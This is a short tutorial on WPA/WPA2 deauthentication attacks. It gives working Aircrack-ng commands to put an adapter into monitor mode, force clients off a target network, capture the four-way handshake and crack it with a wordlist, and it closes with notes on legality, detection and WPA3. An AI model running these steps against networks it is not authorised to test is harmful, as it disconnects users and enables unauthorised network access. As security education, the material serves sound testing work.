WPA/WPA2 Attacks: Deauthentication Explained

TL;DR

This guide explains how attackers use deauthentication packets to crack WPA/WPA2 Wi-Fi networks. We’ll cover the basics of the attack, tools used (Aircrack-ng suite), and important considerations for security.

Understanding Deauthentication Attacks

Wi-Fi networks using WPA/WPA2 rely on a four-way handshake to establish secure connections. An attacker can’t crack the password without capturing this handshake. The most common method to force a client to re-authenticate (and thus capture the handshake) is by sending deauthentication packets.

Steps to Perform a Deauthentication Attack

1. Put Your Wireless Interface into Monitor Mode: This allows your wireless adapter to listen for all Wi-Fi traffic, not just networks you’re connected to. Use the command

   sudo airmon-ng start wlan0

   . Replace ‘wlan0’ with your interface name (use iwconfig to find it). This will usually create a new interface like ‘wlan0mon’.

2. Identify Your Target Network: Use

   sudo airodump-ng wlan0mon

   to scan for nearby networks. Note the BSSID (MAC address) and channel of your target network.

3. Deauthenticate Clients: Use aireplay-ng to send deauthentication packets. This disconnects clients from the network, forcing them to reconnect and triggering the four-way handshake.
   • To deauthenticate a specific client (based on MAC address):

     sudo aireplay-ng -0 1 -a [BSSID] -c [Client MAC Address] wlan0mon

     . Replace ‘[BSSID]’ with the network’s BSSID and ‘[Client MAC Address]’ with the client’s MAC. The ‘-0 1’ sends one deauthentication packet.

   • To deauthenticate all clients:

     sudo aireplay-ng -0 1 -a [BSSID] wlan0mon

     . This is more effective but also noisier and potentially more detectable.

4. Capture the Handshake: While sending deauthentication packets, keep airodump-ng running in another terminal window to capture the handshake. Look for the message “WPA handshake: [BSSID]” in the output.

   sudo airodump-ng wlan0mon --bssid [BSSID] -w capture_file

   . This saves the captured data to files starting with ‘capture_file’.

5. Crack the Handshake: Use aircrack-ng to crack the handshake file. You’ll need a wordlist (a list of potential passwords).

   sudo aircrack-ng -w /path/to/wordlist capture_file*.cap

   . Replace ‘/path/to/wordlist’ with the actual path to your wordlist.

Important Considerations

• Legality: Performing these attacks on networks you don’t own or have permission to test is illegal in most jurisdictions.
• Ethical Hacking: Only use this information for ethical hacking purposes, such as testing your own network’s security.
• Detection: Deauthentication attacks are detectable by intrusion detection systems (IDS) and can alert network administrators.
• WPA3: WPA3 offers stronger protection against these types of attacks due to its use of Simultaneous Authentication of Equals (SAE).